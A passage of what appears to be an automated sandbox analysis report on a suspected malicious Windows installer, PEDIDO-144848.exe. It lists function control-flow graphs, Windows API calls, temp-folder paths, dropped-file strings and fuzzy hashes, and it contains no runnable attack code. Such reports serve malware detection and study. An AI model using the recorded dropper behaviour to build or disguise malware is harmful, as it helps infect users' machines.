                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                        • String ID: "C:\Users\user\Desktop\PEDIDO-144848.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                        • API String ID: 2035342205-627893004
                                                        • Opcode ID: 66d41853b2e100f8aa5dc84de00091d649ca301df736d3cc4483c22267dac329
                                                        • Instruction ID: 760187f4f4892300bbc2109203202489edd73d97d78a60d5512a31c146a0733f
                                                        • Opcode Fuzzy Hash: 66d41853b2e100f8aa5dc84de00091d649ca301df736d3cc4483c22267dac329
                                                        • Instruction Fuzzy Hash: 8F51D631804A08EADB216B618C45BBF7B78DF42714F14813BF955721D1D77C8982EE6E
                                                        Function 00401759 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 400 401759-40177c call 402ace call 40587f 405 401786-401798 call 405da0 call 405812 lstrcatA 400->405 406 40177e-401784 call 405da0 400->406 411 40179d-4017a3 call 40600b 405->411 406->411 416 4017a8-4017ac 411->416 417 4017ae-4017b8 call 4060a4 416->417 418 4017df-4017e2 416->418 426 4017ca-4017dc 417->426 427 4017ba-4017c8 CompareFileTime 417->427 420 4017e4-4017e5 call 4059ee 418->420 421 4017ea-401806 call 405a13 418->421 420->421 428 401808-40180b 421->428 429 40187e-4018a7 call 404fb9 call 402f33 421->429 426->418 427->426 430 401860-40186a call 404fb9 428->430 431 40180d-40184f call 405da0 * 2 call 405dc2 call 405da0 call 405596 428->431 443 4018a9-4018ad 429->443 444 4018af-4018bb SetFileTime 429->444 441 401873-401879 430->441 431->416 463 401855-401856 431->463 445 402967 441->445 443->444 447 4018c1-4018cc CloseHandle 443->447 444->447 450 402969-40296d 445->450 448 4018d2-4018d5 447->448 449 40295e-402961 447->449 452 4018d7-4018e8 call 405dc2 lstrcatA 448->452 453 4018ea-4018ed call 405dc2 448->453 449->445 459 4018f2-4022d8 452->459 453->459 464 4022dd-4022e2 459->464 465 4022d8 call 405596 459->465 463->441 466 401858-401859 463->466 464->450 465->464 466->430
                                                        APIs
                                                        • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\slavelivets,00000000,00000000,00000031), ref: 00401798
                                                        • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\slavelivets,00000000,00000000,00000031), ref: 004017C2
                                                          • Part of subcall function 00405DA0: lstrcpynA.KERNEL32(?,?,00000400,0040322E,Rse Setup,NSIS Error), ref: 00405DAD
                                                          • Part of subcall function 00404FB9: lstrlenA.KERNEL32(0079DD20,00000000,0078FCF8,758B23A0,?,?,?,?,?,?,?,?,?,0040306B,00000000,?), ref: 00404FF2
                                                          • Part of subcall function 00404FB9: lstrlenA.KERNEL32(0040306B,0079DD20,00000000,0078FCF8,758B23A0,?,?,?,?,?,?,?,?,?,0040306B,00000000), ref: 00405002
                                                          • Part of subcall function 00404FB9: lstrcatA.KERNEL32(0079DD20,0040306B,0040306B,0079DD20,00000000,0078FCF8,758B23A0), ref: 00405015
                                                          • Part of subcall function 00404FB9: SetWindowTextA.USER32(0079DD20,0079DD20), ref: 00405027
                                                          • Part of subcall function 00404FB9: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040504D
                                                          • Part of subcall function 00404FB9: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405067
                                                          • Part of subcall function 00404FB9: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405075
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsk7B73.tmp$C:\Users\user\AppData\Local\Temp\nsk7B73.tmp\System.dll$C:\Users\user\slavelivets$Call
                                                        • API String ID: 1941528284-3303909223
                                                        • Opcode ID: 17cbd14428586f76d7af50b729a9077a322d321e92e24f8c2541e02e22effdf4
                                                        • Instruction ID: dbbb128bf7935f0aed0e50e9380fc9841c9442f81e714e1827c6660095eaabca
                                                        • Opcode Fuzzy Hash: 17cbd14428586f76d7af50b729a9077a322d321e92e24f8c2541e02e22effdf4
                                                        • Instruction Fuzzy Hash: FE41E772910515BACB107BB5CC49DAF7AB9EF45368B20C23BF121F10E1C77C8A418A6D
                                                        Function 004060A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileA.KERNELBASE(758B3410,0079FD90,C:\,00405943,C:\,C:\,00000000,C:\,C:\,758B3410,?,C:\Users\user\AppData\Local\Temp\,00405662,?,758B3410,C:\Users\user\AppData\Local\Temp\), ref: 004060AF
                                                        • FindClose.KERNELBASE(00000000), ref: 004060BB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: Find$CloseFileFirst
                                                        • String ID: C:\
                                                        • API String ID: 2295610775-3404278061
                                                        • Opcode ID: d30bbc16997dfcf9f9a572ec6341a2188e66bfdc939d37fad3f946c8dc482195
                                                        • Instruction ID: 4d264840bddbdcf8954fb0232b098af143b8be61859f100819b52cc90bd9207d
                                                        • Opcode Fuzzy Hash: d30bbc16997dfcf9f9a572ec6341a2188e66bfdc939d37fad3f946c8dc482195
                                                        • Instruction Fuzzy Hash: AAD0127595A1205BC71197787C0C84B7A589B053307114A32F46AF22E0D6349C7686E9
                                                        Function 00403720 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 128 403720-403738 call 406139 131 40373a-40374a call 405cfe 128->131 132 40374c-40377d call 405c87 128->132 140 4037a0-4037c9 call 4039e5 call 405900 131->140 136 403795-40379b lstrcatA 132->136 137 40377f-403790 call 405c87 132->137 136->140 137->136 146 403850-403858 call 405900 140->146 147 4037cf-4037d4 140->147 153 403866-40388b LoadImageA 146->153 154 40385a-403861 call 405dc2 146->154 147->146 148 4037d6-4037fa call 405c87 147->148 148->146 158 4037fc-4037fe 148->158 156 40390c-403914 call 40140b 153->156 157 40388d-4038bd RegisterClassA 153->157 154->153 171 403916-403919 156->171 172 40391e-403929 call 4039e5 156->172 159 4038c3-403907 SystemParametersInfoA CreateWindowExA 157->159 160 4039db 157->160 162 403800-40380d call 40583d 158->162 163 40380f-40381b lstrlenA 158->163 159->156 165 4039dd-4039e4 160->165 162->163 166 403843-40384b call 405812 call 405da0 163->166 167 40381d-40382b lstrcmpiA 163->167 166->146 167->166 170 40382d-403837 GetFileAttributesA 167->170 174 403839-40383b 170->174 175 40383d-40383e call 405859 170->175 171->165 181 4039b2-4039ba call 40508b 172->181 182 40392f-403949 ShowWindow call 4060cb 172->182 174->166 174->175 175->166 187 4039d4-4039d6 call 40140b 181->187 188 4039bc-4039c2 181->188 189 403955-403967 GetClassInfoA 182->189 190 40394b-403950 call 4060cb 182->190 187->160 188->171 193 4039c8-4039cf call 40140b 188->193 191 403969-403979 GetClassInfoA RegisterClassA 189->191 192 40397f-4039b0 DialogBoxParamA call 40140b call 403670 189->192 190->189 191->192 192->165 193->171
                                                        APIs
                                                          • Part of subcall function 00406139: GetModuleHandleA.KERNEL32(?,?,?,004031EA,00000009), ref: 0040614B
                                                          • Part of subcall function 00406139: GetProcAddress.KERNEL32(00000000,?), ref: 00406166
                                                        • lstrcatA.KERNEL32(1033,0079E540,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079E540,00000000,00000002,758B3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PEDIDO-144848.exe",00000000), ref: 0040379B
                                                        • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\slavelivets,1033,0079E540,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079E540,00000000,00000002,758B3410), ref: 00403810
                                                        • lstrcmpiA.KERNEL32(?,.exe), ref: 00403823
                                                        • GetFileAttributesA.KERNEL32(Call), ref: 0040382E
                                                        • LoadImageA.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\slavelivets), ref: 00403877
                                                          • Part of subcall function 00405CFE: wsprintfA.USER32 ref: 00405D0B
                                                        • RegisterClassA.USER32(007A16E0), ref: 004038B4
                                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004038CC
                                                        • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403901
                                                        • ShowWindow.USER32(00000005,00000000), ref: 00403937
                                                        • GetClassInfoA.USER32(00000000,RichEdit20A,007A16E0), ref: 00403963
                                                        • GetClassInfoA.USER32(00000000,RichEdit,007A16E0), ref: 00403970
                                                        • RegisterClassA.USER32(007A16E0), ref: 00403979
                                                        • DialogBoxParamA.USER32(?,00000000,00403AB2,00000000), ref: 00403998
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                        • String ID: "C:\Users\user\Desktop\PEDIDO-144848.exe"$.DEFAULT\Control Panel\International$.exe$1033$@y$C:\Users\user\AppData\Local\Temp\$C:\Users\user\slavelivets$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                        • API String ID: 1975747703-3386698409
                                                        • Opcode ID: 72abac218aef0aa68c8201db2a2c7bc2da9bafc71593619d8738dd7e58f1acdc
                                                        • Instruction ID: 69823c21e20ed545a36681f3e22a73ce5ba8c54c43716b07ce110ef4df70eff0
                                                        • Opcode Fuzzy Hash: 72abac218aef0aa68c8201db2a2c7bc2da9bafc71593619d8738dd7e58f1acdc
                                                        • Instruction Fuzzy Hash: 1361D6B5544240AEE310BF619C45F3B3AACEB85789F40857FF941B22E2D77D9D018A2D
                                                        Function 00402CFA Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 202 402cfa-402d48 GetTickCount GetModuleFileNameA call 405a13 205 402d54-402d82 call 405da0 call 405859 call 405da0 GetFileSize 202->205 206 402d4a-402d4f 202->206 214 402d88 205->214 215 402e6f-402e7d call 402c96 205->215 207 402f2c-402f30 206->207 217 402d8d-402da4 214->217 221 402ed2-402ed7 215->221 222 402e7f-402e82 215->222 219 402da6 217->219 220 402da8-402db1 call 403122 217->220 219->220 227 402db7-402dbe 220->227 228 402ed9-402ee1 call 402c96 220->228 221->207 225 402e84-402e9c call 403138 call 403122 222->225 226 402ea6-402ed0 GlobalAlloc call 403138 call 402f33 222->226 225->221 249 402e9e-402ea4 225->249 226->221 253 402ee3-402ef4 226->253 231 402dc0-402dd4 call 4059ce 227->231 232 402e3a-402e3e 227->232 228->221 240 402e48-402e4e 231->240 251 402dd6-402ddd 231->251 239 402e40-402e47 call 402c96 232->239 232->240 239->240 244 402e50-402e5a call 4061ae 240->244 245 402e5d-402e67 240->245 244->245 245->217 252 402e6d 245->252 249->221 249->226 251->240 255 402ddf-402de6 251->255 252->215 256 402ef6 253->256 257 402efc-402f01 253->257 255->240 258 402de8-402def 255->258 256->257 259 402f02-402f08 257->259 258->240 260 402df1-402df8 258->260 259->259 261 402f0a-402f25 SetFilePointer call 4059ce 259->261 260->240 263 402dfa-402e1a 260->263 264 402f2a 261->264 263->221 265 402e20-402e24 263->265 264->207 266 402e26-402e2a 265->266 267 402e2c-402e34 265->267 266->252 266->267 267->240 268 402e36-402e38 267->268 268->240
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 00402D0B
                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\PEDIDO-144848.exe,00000400), ref: 00402D27
                                                          • Part of subcall function 00405A13: GetFileAttributesA.KERNELBASE(?,00402D3A,C:\Users\user\Desktop\PEDIDO-144848.exe,80000000,?), ref: 00405A17
                                                          • Part of subcall function 00405A13: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405A39
                                                        • GetFileSize.KERNEL32(00000000,00000000,007AA000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PEDIDO-144848.exe,C:\Users\user\Desktop\PEDIDO-144848.exe,80000000,?), ref: 00402D73
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                        • String ID: "C:\Users\user\Desktop\PEDIDO-144848.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PEDIDO-144848.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft${K
                                                        • API String ID: 4283519449-1924578707
                                                        • Opcode ID: 01abee4385eb3164d7f4254af187e376370b625cc9aa48c6f885a033e7c9399e
                                                        • Instruction ID: 3261349ff2f4a6e0e52cb66aedc5a428c749111a9fc88119453a55b84fe8b48b
                                                        • Opcode Fuzzy Hash: 01abee4385eb3164d7f4254af187e376370b625cc9aa48c6f885a033e7c9399e
                                                        • Instruction Fuzzy Hash: 9A510671940215AFDB119F60DE89B9E7BB8EB44364F20413BF904B62D1D7BC8D408B9D
                                                        Function 0040547F Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 467 40547f-4054ca CreateDirectoryA 468 4054d0-4054dd GetLastError 467->468 469 4054cc-4054ce 467->469 470 4054f7-4054f9 468->470 471 4054df-4054f3 SetFileSecurityA 468->471 469->470 471->469 472 4054f5 GetLastError 471->472 472->470
                                                        APIs
                                                        • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004054C2
                                                        • GetLastError.KERNEL32 ref: 004054D6
                                                        • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004054EB
                                                        • GetLastError.KERNEL32 ref: 004054F5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
                                                        • API String ID: 3449924974-2230009264
                                                        • Opcode ID: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                        • Instruction ID: 09fe99030eccae78cb9d2ce19bbf77f9f972de75acbbd1990c032815ad2a971a
                                                        • Opcode Fuzzy Hash: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                        • Instruction Fuzzy Hash: 2F010871D14259EADF119BA4C944BEFBFB8EB14315F00417AE904B6280E378A644CFAA
                                                        Function 00401D95 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetDC.USER32(?), ref: 00401D98
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB2
                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401DBA
                                                        • ReleaseDC.USER32(?,00000000), ref: 00401DCB
                                                        • CreateFontIndirectA.GDI32(0040A7F0), ref: 00401E1A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                                        • String ID: Times New Roman
                                                        • API String ID: 3808545654-927190056
                                                        • Opcode ID: 648d7b0dc9db80ea036042f47a1e498ac7e57b814f90c6129580178fecebfba8
                                                        • Instruction ID: 37723da549b7de6e047f5ddf6566bf04a0332ae81d9da388354d8b2e576e77f8
                                                        • Opcode Fuzzy Hash: 648d7b0dc9db80ea036042f47a1e498ac7e57b814f90c6129580178fecebfba8
                                                        • Instruction Fuzzy Hash: 3A015272948340AFE7006B70AE49F9A3FF4AB55315F10847AF241B62E2C6B904569B3E
                                                        Function 004060CB Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
